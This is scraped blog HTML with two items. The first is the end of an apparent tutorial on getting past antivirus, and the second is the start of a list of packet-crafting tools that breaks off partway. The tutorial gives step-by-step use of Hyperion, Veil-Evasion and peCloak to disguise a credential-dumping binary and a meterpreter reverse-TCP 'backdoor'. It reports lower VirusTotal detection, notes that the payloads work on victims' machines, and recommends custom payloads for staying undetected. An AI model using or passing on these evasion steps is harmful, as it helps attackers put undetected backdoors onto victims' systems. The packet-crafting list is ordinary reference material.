<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv5.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #44546a; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 2: output of the modified wce.exe</em></span></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Hyperion</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Encrypting the binary is one of the common ways to bypass antivirus detection. The logic behind using encrypters is to obfuscate the binary from antivirus tools by encrypting it. This will be decrypted back when the binary is run. Kali Linux has got an open source encrypter named Hyperion available in it. This can also be downloaded from the link below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<a href="http://nullsecurity.net/tools/binary.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;" target="_blank">http://nullsecurity.net/tools/binary.html</a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I am using the one I have downloaded from the above link. Let us see how we can use this tool.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Before we use Hyperion, let’s scan the 32 bit version of wce.exe file through virustotal.com first.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv6.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /><span style="border: 0px; box-sizing: border-box; font-family: 'Times New Roman'; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br style="box-sizing: border-box;" /></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
As we can notice, 44 antivirus applications have flagged this as malicious.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Let’s encrypt this file with Hyperion as shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv7.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Let’s scan this newly generated file once again and see the detection ratio.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv8.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
As we can see in the figure above, this has got lesser detection compared to the unencrypted binary.</div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Veil-Evasion</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Veil-Evasion is another popular framework written in python. We can use this framework to generate payloads that can evade majority of AVs.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Veil-evasion can be downloaded from their official website.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<a href="https://www.veil-framework.com/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;" target="_blank">https://www.veil-framework.com</a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
First download and install Veil-Evasion and run it using the following command</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: 'Courier New'; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">“veil-evasion”</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv9.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
As we can see, 46 payloads have been loaded. To use a specific payload, we can type “use” command.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv10.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I am going to choose option 31 to create the executable payload python/meterpreter/rev_tcp. Infact, it creates a python script, which in turn will be converted into an executable using tools like pyinstaller.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv11.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
In the above figure, we have set the LHOST to 192.168.56.101 and typed “generate” command to generate the payload.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Next, it will ask us to enter a name for the payload. I named it “backdoor”. As mentioned earlier, Veil converts python files to exe. It asks us to choose which tool we want to use for this process. Personally, I like Pyinstaller and I am going for it with option 1. These two steps are shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv12.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Once done, it will create our final payload and gives us the location of it as shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv13.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
As we can see in the figure above, the authors of this framework are suggesting not to submit these samples online. Therefore, I have checked this payload in sandboxed environment with Avast Antivirus and it is not detected.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv14.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
These payloads also work fine when they are executed on Victim’s machines.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Following figure shows a meterpreter shell obtained using the payload created above.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv15.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Try with other payloads that use encryption to get better output.</div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
peCloak</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: black; font-family: Arial; font-size: 16pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 21.3333px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">:</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
peCloak is another interesting tool that I came across from the following link.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<a href="http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;" target="_blank">http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/</a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This script automates multiple tricks to evade AVs. The author has written this for his own purposes and he released it publicly as a beta version. This script gives us an idea of how we can write our own scripts to evade Antiviruses.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Let’s see this in action.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I am going to create a meterpreter payload using msfvenom for this purpose. This is shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv16.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Let us scan the payload “test.exe” through virustotal.com as shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv17.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
36 out of 56 antivirus engines have flagged this as malicious.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Now, lets run this using peCloak.py script.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I am using the script with the default options as shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv18.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv19.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
It creates a file called “cloaked.exe” as shown in the figure above.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Let’s scan this new payload and see how many antivirus engines detect is as malicious.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv20.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Only 26 out of 56 have flagged it as malicious.</div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Conclusion:</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Apart from the tools mentioned in this article, there are a couple of other tools out there such as Metasploit’s encoders. It is better to write custom payloads and keep them simple to be away from Antivirus detection rather than creating payloads using popular frameworks. A side note: The results shown in this article may change when you read this article as Antivirus signatures are constantly updated.</div>
<br /></div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-57412312787754130992016-01-07T13:38:00.000+05:302016-01-07T13:38:25.178+05:3015 Best Free Packet Crafting Tools<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Packet crafting is the process of manually creating or editing the existing data packets on a network to test network devices. Hackers and network admins use this process to test a network, check firewall rules, find entry points and test network device’s behaviors.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Network data packets contain various information include data, source address, destination address, version, length, protocol, and few other things depending on the protocol. In packet crafting, one creates a completely new packet or edits the existing packet to change the information packet contains. Then, this packet is sent to the network to see the response of network firewall. By changing values in packet, attackers try to find the entry point in the network to intrude.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I also want to point out that “packet crafting” and “packet spoofing” are not the same thing.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Packet crafting is not a simple task for beginners. It consists of following steps:</div>
<ol style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px 1.5em 1.5em; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet Assembly: </span>Creating a new network packet or capture a packet going over the wire and edit the information as per requirement.</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet Editing:</span> Editing the content of an existing packet</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet Re/Play:</span> Send/Resend a packet in a network</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Packet decoding: </span>Decode and analyze the content of the packet</li>
</ol>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Tools for all these different steps are available. In this post, I will write about tools used in these steps. Few tools are step-specific while few can be used for performing all steps. You can try few or all the given tools to see how these tools work.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I will also recommend you to read our existing article on Packet Crafting. In that article, we have explained packet crafting in detail with explanation of all four steps involved. We have also shown how to use a few packet crafting tools. That article will help you to understand the packet crafting the usage of those tools. Once you understand clearly, you can read this article to see the available packet crafting tools. Some tools are very old but still work fine. Other tools are actively in development, while still others are no longer in development.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I will also recommend you to learn about network packets, packet structure of different protocols and network layers. If you do not know these things, you will not be able to understand how to do packet crafting and how the things work with these tools. For learning purposes, you must understand the basics of networking before proceeding with the list of these tools. You must know about data packets of different protocols, different fields in packets, the meaning or purpose of those packet fields, and how those packets are used in the network communication. Once you know about those things, you will be able to change those values to see desired effect in the network. So, do not try these tools without learning the previously-mentioned skills. You will end up wasting your time and effort.<br />
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
These are the 15 best but free packet crafting tools.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">1. Hping</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Hping is one of the most popular and free packet crafting tool available. It lets you assemble and send custom ICMP, UDP, TCP and Raw IP packets. This tool is used by network admins for security auditing and testing of firewalls and networks. Now this tool is also available within Nmap Security Scanner.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
HPing is available for wide-range of platforms including Windows, MacOs X, Linux, FreeBSD, NetBSD, OpenBSD and Solaris.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Hping: <a href="http://www.hping.org/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.hping.org/</span></a></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">2. Ostinato</span></div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Ostinato is an open source and cross-platform network packet generator and analyzing tool. It comes with GUI interface that makes it easy to use and understand. It supports Windows, Linux, BSD and Mac OS X platforms. You can also try using it on other platforms.</div>
<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Best thing about the tool is that it supports most common standard protocols. See the list of supported protocols below</div>
<ul style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 25.9px; margin: 0px 1.5em 1.5em 72pt; padding: 0px; vertical-align: baseline;">
